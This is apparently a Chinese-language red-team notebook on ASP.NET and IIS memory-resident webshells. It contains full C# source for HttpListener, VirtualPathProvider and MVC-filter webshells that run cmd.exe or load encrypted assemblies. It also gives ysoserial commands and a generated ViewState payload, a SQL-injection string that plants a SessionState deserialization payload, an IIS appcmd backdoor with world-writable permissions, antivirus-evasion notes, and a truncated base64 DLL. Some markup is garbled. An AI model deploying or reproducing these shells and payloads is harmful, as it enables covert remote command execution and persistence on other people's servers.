using System.Diagnostics;using System.Text;using System.IO;using System.Net;using System.Web;using System;using System.Collections.Generic;using System.Collections;using System.Threading;public class SharpMemshell{    static void Main(string args)    {        HttpContext ctx = HttpContext.Current;        Thread Listen = new Thread(Listener);        Thread.Sleep(0);        Listen.Start(ctx);    }    public SharpMemshell() {        HttpContext ctx = HttpContext.Current;        Thread Listen = new Thread(Listener);        Thread.Sleep(0);        Listen.Start(ctx);    }    public static void log(string data)    {        try        {            string logfile = "c:\\log.txt";            if (!File.Exists(logfile))            {                byte[] output = System.Text.Encoding.Default.GetBytes(data);                FileStream fs = new FileStream(logfile, FileMode.Create);//为文件提供一个 Stream，支持同步和异步读写操作。                fs.Write(output, 0, output.Length);                fs.Flush();                fs.Close();            }            else            {                using (StreamWriter sw = new StreamWriter(logfile, true))                    /*                     * using语句一开始定义了一个StreamWriter的对象，                     * 之后在整个语句块中都可以使用sw，                     * 在using语句块结束的时候，sw的Dispose方法将会被自动调用                     *对于任何IDisposable接口的类型，都可以使用using语句                     *                      * 托管资源：由CLR管理分配和释放的资源，也就是我们直接new出来的对象；                     * 非托管资源：不受CLR控制的资源，也就是不属于.NET本身的功能，                     * 往往是通过调用跨平台程序集(如C++)或者操作系统提供的一些接口，                     * 比如Windows内核对象、文件操作、数据库连接、socket、Win32API、网络等。                     *                      * 假设我们要使用FileStream,使用try…catch…finally…这种做法，                     * 因为它的实现调用了非托管资源，所以我们必须用完之后要去显式释放它，                     * 如果不去释放它，那么可能就会造成内存泄漏。                     *                     * 一个标准的释放非托管资源的类应该去实现IDisposable接口                     * 要实现IDisposable接口，我们其实应该这样做：                     * 实现Dispose方法；                     * 提取一个受保护的Dispose虚方法，在该方法中实现具体的释放资源的逻辑；                     * 添加析构函数；                     * 添加一个私有的bool类型的字段，作为释放资源的标记                     */                {                    sw.WriteLine(data);                }            }        }        catch (Exception e)        {            Console.WriteLine("log error:\n{0}",e);        }    }    public static Dictionary<string, string> parse_post(HttpListenerRequest request)    {        var post_raw_data = new StreamReader(request.InputStream, request.ContentEncoding).ReadToEnd();//实现一个 TextReader，它以特定编码从字节流中读取字符。        Dictionary<string, string> postParams = new Dictionary<string, string>();        string[] raw_Params = post_raw_data.Split('&');        foreach (string param in raw_Params)        {            string[] kvPair = param.Split('=');// key-value-pair键值对            string p_key = kvPair[0];            string value = HttpUtility.UrlDecode(kvPair[1]);            postParams.Add(p_key,value);        }        return postParams;    }    public static void SetRespHeader(HttpListenerResponse resp)    {        resp.Headers.Set(HttpResponseHeader.Server, "Microsoft-IIS/8.5");        resp.Headers.Set(HttpResponseHeader.ContentType, "text/html; charset=utf-8");        resp.Headers.Add("X-Powered-By", "ASP.NET");    }    public static void Listener(object ctx)    {        HttpListener listener = new HttpListener();        try        {            if (!HttpListener.IsSupported)            {                return;            }            string input_key = "key";            string pass = "pass";            string nodata = "PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMDEvL0VOIiJodHRwOi8vd3d3LnczLm9yZy9UUi9odG1sNC9zdHJpY3QuZHRkIj4NCjxIVE1MPjxIRUFEPjxUSVRMRT5Ob3QgRm91bmQ8L1RJVExFPg0KPE1FVEEgSFRUUC1FUVVJVj0iQ29udGVudC1UeXBlIiBDb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9dXMtYXNjaWkiPjwvSEVBRD4NCjxCT0RZPjxoMj5Ob3QgRm91bmQ8L2gyPg0KPGhyPjxwPkhUVFAgRXJyb3IgNDA0LiBUaGUgcmVxdWVzdGVkIHJlc291cmNlIGlzIG5vdCBmb3VuZC48L3A+DQo8L0JPRFk+PC9IVE1MPg0K";            /*             * http://www.w3.org/TR/html4/strict.dtd">             * Not Found             *              * 
Not Found
             * 
HTTP Error 404. The requested resource is not found.
             *              */            string url = "http://*:80/favicon.ico/";            listener.Prefixes.Add(url);            listener.Start();            byte[] not_found = System.Convert.FromBase64String(nodata);            string key = System.BitConverter                .ToString(new System.Security.Cryptography.MD5CryptoServiceProvider().ComputeHash(                    System.Text.Encoding.Default.GetBytes(input_key))).Replace("-", "").ToLower().Substring(0, 16);            /*             * System.BitConverter.ToString将指定字节数组的每个元素的数值转换为其等效的十六进制字符串表示形式。             * System.Security.Cryptography.MD5CryptoServiceProvider().ComputeHash计算输入数据的 MD5 哈希值             */            string md5 = System.BitConverter                .ToString(new System.Security.Cryptography.MD5CryptoServiceProvider().ComputeHash(                    System.Text.Encoding.Default.GetBytes(pass + key))).Replace(",", "");            Dictionary<string, dynamic> sessionDictionary = new Dictionary<string, dynamic>();//dynamic的对象会绕过静态类型检查            Hashtable sessionTable = new Hashtable();            while (true)            {                HttpListenerContext context = listener.GetContext();                HttpListenerRequest request = context.Request;                HttpListenerResponse response = context.Response;                SetRespHeader(response);                Stream stm = null;                HttpContext httpContext;                try                {                    if (ctx != null)                    {                        httpContext = ctx as HttpContext; //传入的ctx为HttpContext类型                    }                    else                    {                        HttpRequest req = new HttpRequest("", request.Url.ToString(), request.QueryString.ToString());                        System.IO.StreamWriter writer = new StreamWriter(response.OutputStream);                        HttpResponse resp = new HttpResponse(writer);                        httpContext = new HttpContext(req, resp);                    }                    var method = request.Headers["Type"];                    if (method == "print")                    {                        byte[] output = Encoding.Default.GetBytes("OK");                        response.StatusCode = 200;                        response.ContentLength64 = output.Length;                        stm = response.OutputStream;                        stm.Write(output,0,output.Length);                        stm.Close();                    }                    else if(method=="cmd"&&request.HttpMethod=="POST")                    {                        Dictionary<string, string> postParams = parse_post(request);                        Process p = new Process();                        p.StartInfo.FileName = "cmd.exe";                        p.StartInfo.Arguments = "/c " + postParams[pass];                        p.StartInfo.UseShellExecute = false;                        p.StartInfo.RedirectStandardOutput = true;                        p.StartInfo.RedirectStandardError = true;                        p.Start();                        byte[] data = Encoding.UTF8.GetBytes(p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd());                        response.StatusCode = 200;                        response.ContentLength64 = data.Length;                        stm = response.OutputStream;                        stm.Write(data, 0, data.Length);                    }else if (method=="mem_b64"&& request.HttpMethod=="POST")                    {                        Dictionary<string, string> postParams = parse_post(request);                        byte[] data = System.Convert.FromBase64String(postParams[pass]);                        data = new System.Security.Cryptography.RijndaelManaged()                            .CreateDecryptor(System.Text.Encoding.Default.GetBytes(key),                                System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(data, 0, data.Length);                        /*                         *System.Security.Cryptography.RijndaelManaged().CreateDecryptor                         * 使用指定的密钥和初始化向量 (IV) 创建一个对称的 Rijndael 解密器对象。                         * Rijndael（发音为 rain-dahl）是一种高级加密标准 (AES) 算法。                         * TransformFinalBlock计算指定字节数组的指定区域的转换。                         */                        Cookie sessionCookie = request.Cookies["ASP.NET_SessionId"];                        if (sessionCookie == null)                        {                            Guid sessionId = Guid.NewGuid();                            var payload = (System.Reflection.Assembly)typeof(System.Reflection.Assembly)                                .GetMethod("Load", new System.Type[] { typeof(byte[]) })                                .Invoke(null, new object[] { data });                            /*                             *通过从字节数组加载程序集来创建 System.Reflection.Assembly 类的实例                             * 了能够使用反射，需要在项目中引用 System.Reflection 命名空间                             * 在使用反射的开始，你会获取一个 Type 类型的对象，从这个对象上进一步获取 程序集，类型，模块 等信息                             *                              * typeof(System.Reflection.Assembly) 获取 System.Reflection.Assembly type对象                             * 在 System.Reflection.Assembly 类型上调用 GetMethod(“Load”, new System.Type[] { typeof(byte[]) }) 方法                             * 以获取对其采用字节数组参数的 Load 方法的引用。                             * Invoke(null, new object[] { data })                             * 用于以空对象引用作为其对象实例参数并以字节数组数据作为其参数值来调用 Load 方法。                             * 这从字节数组加载程序集并返回 System.Reflection.Assembly 类的一个实例，                             * 该实例分配给 payload 变量                             */                            sessionDictionary.Add(sessionId.ToString(),payload);                            response.SetCookie(new Cookie("ASP.NET_SessionId", sessionId.ToString()));                            byte[] output = Encoding.Default.GetBytes("");                            response.StatusCode = 200;                            response.ContentLength64 = output.Length;                            stm = response.OutputStream;                            stm.Write(output,0,output.Length);                        }                        else                        {                            dynamic payload = sessionDictionary[sessionCookie.Value];                            MemoryStream outStream = new MemoryStream();                            object o = ((System.Reflection.Assembly)payload).CreateInstance("LY");                            o.Equals(outStream);                            o.Equals(httpContext);                            o.Equals(data);                            o.ToString();                            byte[] r = outStream.ToArray();                            outStream.Dispose();                            response.StatusCode = 200;                            string new_data = md5.Substring(0, 16) + System.Convert.ToBase64String(                                new System.Security.Cryptography.RijndaelManaged()                                    .CreateEncryptor(System.Text.Encoding.Default.GetBytes(key),                                        System.Text.Encoding.Default.GetBytes(key))                                    .TransformFinalBlock(r, 0, r.Length)) + md5.Substring(16);                            byte[] new_data_bytes = Encoding.ASCII.GetBytes(new_data);                            response.ContentLength64 = new_data_bytes.Length;                            stm = response.OutputStream;                            stm.Write(new_data_bytes, 0, new_data_bytes.Length);                        }                                            } else if (method == "mem_raw" && request.HttpMethod == "POST" && request.HasEntityBody)                    {                        int contentLength = int.Parse(request.Headers.Get("Content-Length"));                        byte[] array = new byte[contentLength];                        request.InputStream.Read(array, 0, contentLength);                        byte[] data = new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(array, 0, array.Length);                        if (sessionTable["payload"] == null)                        {                            sessionTable["payload"] = (System.Reflection.Assembly)typeof(System.Reflection.Assembly).GetMethod("Load", new System.Type[] { typeof(byte[]) }).Invoke(null, new object[] { data });                        }                        else                        {                            object o = ((System.Reflection.Assembly)sessionTable["payload"]).CreateInstance("LY");                            System.IO.MemoryStream outStream = new System.IO.MemoryStream();                            o.Equals(outStream);                            o.Equals(httpContext);                            /*                             * Godzilla重写了Equals                             * this.httpContext = (HttpContext)obj;                             * this.httpRequest = this.httpContext.Request;                             * this.httpResponse = this.httpContext.Response;                             * result = true;                             */                            o.Equals(data);                            o.ToString();                            byte[] r = outStream.ToArray();                            outStream.Dispose();                            if (r.Length > 0)                            {                                r = new System.Security.Cryptography.RijndaelManaged().CreateEncryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(r, 0, r.Length);                                response.StatusCode = 200;                                stm = response.OutputStream;                                response.ContentLength64 = r.Length;                                stm.Write(r, 0, r.Length);                            }                        }                    }                    else                    {                        response.StatusCode = 404;                        response.ContentLength64 = not_found.Length;                        stm = response.OutputStream;                        stm.Write(not_found, 0, not_found.Length);                    }                }                catch (Exception e)                {                    response.StatusCode = 404;                    response.ContentLength64 = not_found.Length;                    stm = response.OutputStream;                    stm.Write(not_found, 0, not_found.Length);                    Console.WriteLine("Exception caught1: " + e.ToString());                    //log("Exception caught1: " + e.ToString());                }                finally                {                    if (stm != null)                    {                        stm.Flush();                        stm.Close();                    }                    response.OutputStream.Flush();                    response.OutputStream.Close();                }            }        }        catch (Exception e)        {            Console.WriteLine("Exception caught2: " + e.ToString());            //log("Exception caught2: "+ e.ToString());            if (listener.IsListening)            {                listener.Stop();            }        }    }}

执行cmd，启动一个process执行cmd命令

加载assmbly，base64解码后，用key进行aes解密然后反序列化加载payload，将结果夹杂在一段md5的16位中介返回

使用方法

listener内存马就是一个起了http服务的exe或者dll，但是因为需要system权限所以很难用

执行exe
利用GadgetToJScript
利用aspx加载dll
利用反序列化漏洞加载dll

详细命令在https://mp.weixin.qq.com/s/zsPPkhCZ8mhiFZ8sAohw6w及https://github.com/A-D-Team/SharpMemshell/tree/main/HttpListener

访问http://127.0.0.1/favicon.ico/启动成功

virtualPath

哥斯拉virtualPath内存马

哥斯拉virtualPath内存马https://github.com/A-D-Team/SharpMemshell/blob/69ab8cff53689e53076b534537d384b3169be0cb/VirtualPath/memshell.cs#L146

VirtualPathProvider类提供一组方法，用于实现 Web 应用程序的虚拟文件系统。在虚拟文件系统中，文件和目录由服务器操作系统提供的文件系统外的其他数据存储管理。例如，可以使用虚拟文件系统将内容存储在SQL Server数据库中。

virtualPath内存马就是映射一个物理上不存在的ASP.NET页到URL中

写virtualPath内存马：

自定义一个类继承虚拟文件对象VirtualFile类，并且重写Open方法，该方法原本是读取数据库里的文件源码内容，但星主在该方法里替换成启动cmd进程的代码，访问/myvirtualfile.aspx 触发启动新进程
VirtualPathProvider提供给web应用检索自定义的VirtualFile，所以需要重写该类的GetFile方法，并实例化自定义的VirtualFile
在global.asax全局文件的Application_Start方法里通过HostingEnvironment类注册这个自定义的实例
访问/myvirtualfile.aspx?cmd=whoami，得到了执行的结果

<%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><%@ Import Namespace="System.Web.Hosting" %>"server" language="c#">    public void Page_load()    {        HostingEnvironment.RegisterVirtualPathProvider(new MyVirtualPathProvider());            }    public class MyVirtualPathProvider : VirtualPathProvider    {        public override bool FileExists(string virtualPath)        {            virtualPath = virtualPath.ToLower();            if (virtualPath.Contains("godshell"))            {                return true;            }            else            {                return Previous.FileExists(virtualPath);            }            //return base.FileExists(virtualPath);        }        public override VirtualFile GetFile(string virtualPath)        {            virtualPath = virtualPath.ToLower();            if (virtualPath.Contains("godshell"))            {                return new MyVirtualFile(virtualPath);            }            else            {                return Previous.GetFile(virtualPath);            }            //return base.GetFile(virtualPath);        }    }    public class MyVirtualFile : VirtualFile    {        private string myPath;        public MyVirtualFile(string virtualPath)            : base(virtualPath)        {            myPath = virtualPath;        }        public override Stream Open()        {            Stream stream = new MemoryStream();            if (myPath.Contains("godshell"))            {                String cmd = System.Web.HttpContext.Current.Request.QueryString["cmd"];                if (cmd != null)                {                    Process p = new Process();                    p.StartInfo.FileName = "cmd.exe";                    p.StartInfo.Arguments = "/c " + cmd;                    p.StartInfo.UseShellExecute = false;                    p.StartInfo.RedirectStandardOutput = true;                    p.StartInfo.RedirectStandardError = true;                    p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;                    p.Start();                    byte[] data = Encoding.Default.GetBytes(p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd());                    System.Web.HttpContext.Current.Response.Write("
" + Encoding.Default.GetString(data) + "
");                }                else                {                    System.Web.HttpContext.Current.Response.Write("虚拟WebShell功能一切正常，尝试执行cmd命令吧！example: godshell.aspx?cmd=ipconfig");                }            }            return stream;        }    }

但其实不用实现virtualFile，直接把payload写在virtualPrivoder中即可，现实中面临免杀的问题其实不是插入位置的问题而是process启动进程的问题，更改位置和更改filter内存马一样意义不大

viewstate

使用条件

需要拿到硬编码的 machineKey，一般储存在根目录下的 web.config 文件中。
较常见与使用了多点负载均衡部署的传统 ASP.net MVC 开发的网站之中，因为machineKey默认为动态生成，在负载均衡环境中，需要固定使用相同的machineKey才能互相识别其他节点生成的页面里的VIEWSTATE数据。
通用系统里的 machineKey 一般不会更改。

原理

.NET 使用 LosFormatter 序列化数据存储到客户端的ViewState，当提交POST 请求后又会将ViewState保存的数据发送到服务端，这个时候在服务端就会使用 ObjectStateFormatter 进行反序列化，所以我们用ysoserial的LosFormatter生成ViewState数据

测试环境

添加login.aspx

<%@ Page Language="C#" AutoEventWireup="true" CodeBehind="login.aspx.cs"Inherits="UploadFile.login" %>"http://www.w3.org/1999/xhtml">"server">"Content-Type" content="text/html; charset=utf-8"/>"form1" runat="server">
"server" ID="userName" placeholder="请输入用户名">
"server" ID="pwd" placeholder="请输入密码">
"server" OnClick="Unnamed_Click" Text="登录" />

设置login.aspx.cs

using System;using System.Collections.Generic;using System.Linq;using System.Web;using System.Web.UI;using System.Web.UI.WebControls;namespace UploadFile{public partial class login : System.Web.UI.Page{protected void Page_Load(object sender, EventArgs e){}protected void Unnamed_Click(object sender, EventArgs e){string username = this.userName.Text;string pwd = this.pwd.Text;if(string.IsNullOrEmpty(username) || string.IsNullOrEmpty(pwd)){Response.Write("not null");return;}if(username=="admin" && pwd == "123456"){Response.Write("success");}else{Response.Write("falied");}}}}

设置web.config

"1.0" encoding="utf-8"?>"true" targetFramework="4.7.2" />"4.7.2" /><add namespace="System.Web.Optimization" /><add assembly="Microsoft.AspNet.Web.Optimization.WebForms"namespace="Microsoft.AspNet.Web.Optimization.WebForms" tagPrefix="webopt" />"BF579EF0E9F0C85277E75726BFC9D0260FADE8DE2864A583484AA132944F602D"decryptionKey="51FE611365277B07911521B7CAFE3766751D16C33D96242F0E63E93FB102BCE2"decryption="AES" validation="HMACSHA256" />........

payload

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "calc.exe" --path="/login.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="51FE611365277B07911521B7CAFE3766751D16C33D96242F0E63E93FB102BCE2" --validationalg="HMACSHA256" --validationkey="BF579EF0E9F0C85277E75726BFC9D0260FADE8DE2864A583484AA132944F602D"

dG%2BXIvGDQVlqrEpKA48OYX9G9sc0WlzQ65MPU3Hm%2FZtYIlHWF19dCQOffbqs5hNvs3FTBKfmIRdNlTh9LseDhdZ6nUIAJTqXUPf9G9XLyIwPrBc4lzCEPJvbtkqal8rYTnuEXvBQtqhkh6Urg0OqDHbkcZfj%2F6bN8cgdQe%2BxZZnrls6P5adeanrNmAcmLTplGGG0gW6Ll5VIedCtyMt3mkHauGTj95F%2B6HSp%2BpqJ806kpaxi5f5FRVXfbO3Ylv7PR%2FpfNRnrMpnuX3SV1NDjbvWyzSn63TFTGXgjIvVk68tCo8QPXWR00iqDugGFuqd6jKHLN8r7tzvebfYxziIESFmPx6dmwe5qZrytqapErGRmMqNHPPCvMaWozwtqhEAqTDLabfaZMAkt0cPIkl57wDEjT0DDQaIRPDDyyqwh1NuLo0vPUBWwjV7VUqyBauATGlnKvcNN4HgSdL2qvZsRGybsIuWrgWbq9LaOEO9B8ZZABhL%2BKCa5qNS4gjZNWqnvnbI6iOqCflWS%2BDg5Fcb0ThI3iS2pSbddIZUDe%2FxE6n93KPyJ27enD%2BTB8QbaPDj2u8YtuWoxDbacxhraHyL29Ep8bCjty189m7hccGJVrfYqsy%2BqqpWyCLGhmgIWMzIsDDl0mgh9FwGA6nBOIOYyH0sAb8TXpfjvjC58GLKfPupWdTG%2FO7iDtGWLFkmCGcRMCeF2JCsttQlsYnIJq4TVaLHtvjGwNZDLKCvApeyO%2FIWpU2BrPe%2FaMNbEaemw7PLm%2BBgF40QFPqXdQaP4e%2B79jAMAjKvJmE9WhfiISROw1DvRuF17hN8X%2Ft6C9gyQRY97g8UMNLKdW77hgdRp%2FEzD5jbG5HY%2Bx1mivd2lEI8COOGPTYm69zHWLO4i3gh3KmCuNNc85XhAxiZpZ8Ytq0QB%2FsVeSt8KS70cpRBbbQmv%2Bffxu%2FLSQaQluGFoXRD55wFNJphST7K5eLlhRclfffcviLYkwiRARx9EAPR4HoBylNfzWJPCBqfEZc%2FrnANizSXwnLfCfMmXa8lT7%2FzFMb3IlSTOvZaqfi%2FA8iiXWCx0HeJwlWvL0VkGld70B%2FrrGbJasD067fMfSKeUQeeGkohnAWdcqYS%2BzYDCOuoMdL%2Bzs4W9SUr0INgqH%2FsxUK4KsXqH%2Fp%2FxVNzXCx65IsfJ%2BqTkU8kJc%2BDPgs8LnRAq6Q1pMhY8qSaNlJ%2FC6hEwRBNY8mlVO%2B8cBkN7uWoqFvsGZPPxSJZ0flXo%2FDdjJMcS%2FKzgAwcRu92AojRQOKBzYFNDRGpia7uSnH3zIhez4BBT2Jou3g%3D%3D

本地测试是因为burp抓包问题，ip应设置为内网非127.0.0.1的ip，如果用virtual stdio调试，需修改host头未localhost

sessionstate

前置条件

sqlserver sa权限
服务器负载均衡，.net站点session存放在数据库中

服务器调用时反序列化取出session

                using(stream = new MemoryStream(buf)) {                    item = SessionStateUtility.DeserializeStoreData(context, stream, s_configCompressionEnabled);                    _rqOrigStreamLen = (int) stream.Position;                }

将反序列化的数据交给HttpStaticObjectsCollection.Deserialize(reader)处理最终交给AltSerialization.ReadValueFromStream(reader)处理，调用ysoserial中AltSerialization反序列化链生成payload

ysoserial.exe -p Altserialization -M HttpStaticObjectsCollection -o base64 -c "calc.exe"

添加SessionStateUtility 包装

先將原本從 ysoserial.net 產出的 payload 從 base64 轉成 hex 表示，再前後各別添加 6、1 bytes timeout false true HttpStaticObjectsCollection eof┌─────────┐ ┌┐ ┌┐ ┌───────────────────────────────────────────────┐ ┌┐00 00 00 00 00 01 010000000001140001000000fff ... 略 ... 0000000a0b ff

注入数据库中

?id=1; UPDATE ASPState.dbo.ASPStateTempSessions       SET SessionItemShort = 0x{Hex_Encoded_Payload}       WHERE SessionId LIKE '{ASP.NET_SessionId}%25'; --

注入后用同样的session id访问任意aspx页面即可出发反序列化操作

非Framework

iis后门（appcmd）

通过iis的appcmd命令添加一个网站，在另一个网站放我的shell（类似listener内存马）。

appcmd要求高权限
要求能执行命令
其他的端口可以被访问到

C:\windows\sytstem32\inetsrv\APPCMD add site /name:test /bindings:"http/*:81:" /physicalPath:"C:\windows\temp\123"cacls.exe C:\windows\temp\123 /e /t /g everyone:FC:\windows\sytstem32\inetsrv\APPCMD set app "test/" /applicationPool:".NET v2.0"

预编译问题

预编译的站点不会执行我们上传的aspx文件

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_compiler -v \ -p src target -fixednames生成的文件除了PrecompiledApp.config全部拖入目标网站

预编译配置文件在PrecompiledApp.config，修改updatable为true就能动态编译aspx文件，需要重启iis
直接上传编译好的aspx文件,在aspx文件夹下执行如下命令

Shell管理工具及免杀

symantec测试软件

https://bbs.kafan.cn/forum.php?mod=forumdisplay&fid=51&page=1&filter=typeid&typeid=292

先安装服务端再安装客户端，免费试用60天，测完免杀下次重新装虚拟机就好了

aspxspy就是利用最简单的启动一个process执行命令，静态直接被杀

哥斯拉普通马直接杀

filter内存马静态均可存活,修改哥斯拉内存马为aspx文件，尝试重写Equals方法失败，跟踪报错

An IL variable is not available at the current native IP

根据官方回答开启JIT失败，未解决

蚁剑本身的内存马功能根据介绍是使用虚拟目录内存马，且需要落地一个蚁剑shell再用蚁剑后渗透插件派生，很麻烦，这里直接用蚁剑的payload+filter内存马成功连接

改用蚁剑成功，直接使用命令可看到iis打开了程序，尝试使用蚁剑打开程序同样可看到iis打开了程序

直接使用cmd

<%@ Page Language="c#"%><%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.Web.Mvc" %>"server">    public void Page_load()    {    }    public class MyAuthorizeFilter : AuthorizeAttribute    {        public override void OnAuthorization(AuthorizationContext filterContext)        {            String cmd = filterContext.HttpContext.Request.QueryString["cmd"];            if (cmd != null)            {                HttpResponseBase response = filterContext.HttpContext.Response;                Process p = new Process();                p.StartInfo.FileName = "cmd.exe";                p.StartInfo.Arguments = "/c " + cmd;                p.StartInfo.UseShellExecute = false;                p.StartInfo.RedirectStandardOutput = true;                p.StartInfo.RedirectStandardError = true;                p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;                p.Start();                byte[] data = Encoding.UTF8.GetBytes(p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd());                response.Write(Encoding.Default.GetString(data));            }            Console.WriteLine("auth filter inject");        }    }<%    GlobalFilterCollection filters = GlobalFilters.Filters;    filters.Add(new MyAuthorizeFilter());%>

蚁剑

<%@ Page Language="c#"%><%@ Import Namespace="System.Web.Mvc" %><%@ Import Namespace="System.Web.Mvc.Filters" %>"server">    public class MyAuthFilter : IAuthenticationFilter    {        public void OnAuthentication(AuthenticationContext filterContext)        {            HttpContext context = HttpContext.Current;            String Payload = filterContext.HttpContext.Request.Params["ant"];            if (Payload != null)            {                System.Reflection.Assembly assembly = System.Reflection.Assembly.Load(Convert.FromBase64String(Payload));                assembly.CreateInstance(assembly.GetName().Name + ".Run").Equals(context);                context.Response.End();            }            Console.WriteLine("auth filter inject");        }        public void OnAuthenticationChallenge(AuthenticationChallengeContext filterContext)        {        }    }<%    GlobalFilterCollection globalFilterCollection = GlobalFilters.Filters;    globalFilterCollection.Add(new MyAuthFilter(), -2);%>

可自定义修改class名称方便隐藏，缺点，返回结果未加密

添加编码解码器

<%@ Page Language="c#"%><%@ Import Namespace="System.IO" %><%@ Import Namespace="System.Security.Cryptography" %><%@ Import Namespace="System.Web.Mvc" %><%@ Import Namespace="System.Web.Mvc.Filters" %>"server">    public class MyAuthFilter : IAuthenticationFilter    {        public void OnAuthentication(AuthenticationContext filterContext)        {            HttpContext context = HttpContext.Current;            String Payload = filterContext.HttpContext.Request.Params["ant"];            if (Payload != null)            {                /*string key = "3c6e0b8a9c15224a";                byte[] strr = Convert.FromBase64String(Payload);                var aes = new RijndaelManaged();                aes.IV = Encoding.UTF8.GetBytes(key);                aes.Key = Encoding.UTF8.GetBytes(key);                aes.Mode = CipherMode.CBC;                aes.Padding = PaddingMode.Zeros;                var cryptoTransform = aes.CreateDecryptor();                var resultArray = cryptoTransform.TransformFinalBlock(strr, 0, strr.Length);                string tt = System.Text.Encoding.UTF8.GetString(resultArray);                byte[] bytes = Convert.FromBase64String(tt);                string zz=  Encoding.UTF8.GetString(bytes);*/                System.Reflection.Assembly assembly = System.Reflection.Assembly.Load(Convert.FromBase64String(Payload));                               assembly.CreateInstance(assembly.GetName().Name + ".Run").Equals(context);                //context.Response.Write();                //MemoryStream sm_response = new MemoryStream();                /*string sm_response = context.Response.ToString();                byte[] arraysm_response = Encoding.UTF8.GetBytes(sm_response);                var aes_response = new RijndaelManaged();                aes_response.IV = Encoding.UTF8.GetBytes(key);                aes_response.Key = Encoding.UTF8.GetBytes(key);                aes_response.Mode = CipherMode.CBC;                aes_response.Padding = PaddingMode.Zeros;                var cTransform = aes_response.CreateEncryptor();                var resultArray_response = cTransform.TransformFinalBlock(arraysm_response, 0, arraysm_response.Length);                string str_aes_response_b64 = Convert.ToBase64String(resultArray_response);                context.Response.Write(str_aes_response_b64);*/                context.Response.End();            }            Console.WriteLine("auth filter inject");        }        public void OnAuthenticationChallenge(AuthenticationChallengeContext filterContext)        {            var a = 1;        }    }<%    GlobalFilterCollection globalFilterCollection = GlobalFilters.Filters;    globalFilterCollection.Add(new MyAuthFilter(), -2);%>

添加后发现可以处理cmd及测试连接即仅有ant参数的功能，而蚁剑管理文件还需要添加path参数，导致报错

去翻一下payload源码，看下data[_]的赋值到底是怎么做的,将dll还原

using System;using System.IO;using System.Collections.Generic;using System.Linq;using System.Text;using System.Threading.Tasks;namespace test1{ class Program { static void Main(string[] args) { string Asstring = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAC+3CGIAAAAAAAAAAOAAAiELAQgAAA4AAAAGAAAAAAAA/iwAAAAgAAAAQAAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAKQsAABXAAAAAEAAAKACAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAABA0AAAAgAAAADgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAKACAAAAQAAAAAQAAAAQAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAFAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAADgLAAAAAAAAEgAAAACAAUA5CMAAMAIAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABswBACzAAAAAQAAEQIDKAIAAAYCcgEAAHB9BQAABAJyDQAAcH0DAAAEAnIbAABwfQQAAAQCch0AAHB9BgAABHIhAABwCnIpAABwCwJ7AgAABAJ7BQAABG8DAAAKchsAAHAMAgJ7AQAABG8EAAAKcjEAAHBvBQAACigFAAAGDQgCCSgDAAAGKAYAAAoM3hYTBHI7AABwEQRvBwAACigGAAAKDN4AAnsCAAAEBgIIKAYAAAYHKAgAAApvCQAAChcqAAEQAAAAAFYALIIAFggAAAEbMAMAdAAAAAIAABEDbwoAAApvCwAACiwkA3QBAAAbCgIGFpp0AgAAAX0BAAAEAgYXmnQDAAABfQIAAAQqA3QKAAABCwIHbwwAAAp9AgAABAIHbw0AAAp9AQAABN4hJigOAAAKDAIIbwwAAAp9AgAABAIIbw0AAAp9AQAABN4AKgEQAAAAADEAIVIAIQgAAAETMAUAyAAAAAMAABFyGwAAcAoDcw8AAAoLB28QAAAKEwQWEwUrQhEEEQWaDAZyTwAAcAhvEQAACgMIbxEAAAooBgAACigSAAAKEwYSBnJrAABwKBMAAAooFAAACigGAAAKChEFF1gTBREFEQSOaTK2B28VAAAKEwcWEwgrTREHEQiaDQZykwAAcAlvEQAACgMJbxEAAAooBgAACigSAAAKEwkSCXJrAABwKBMAAAoJbxYAAAqMEAAAASgXAAAKKAYAAAoKEQgXWBMIEQgRB45pMqsGKhMwBABBAAAABAAAEXMYAAAKChYLKycGAwcYbxkAAAogAwIAACgaAAAKKBsAAAooHAAACm8dAAAKJgcYWAsHA28eAAAKMtAGbx8AAAoqAAAAGzACAHoAAAAFAAARFgoCewYAAAQoIAAACgoDBm8hAAAKEAHeAybeAAJ7AwAABCUNLD8Jcg0AAHAoIgAACi0PCXKxAABwKCIAAAotGysjAnsFAAAEKCMAAAoDKCQAAApvJQAACgsrDAIDKAQAAAYLKwIDC94PDAhvBwAACm8fAAAKC94AByoAAAEcAAAAAAIAFxkAAwgAAA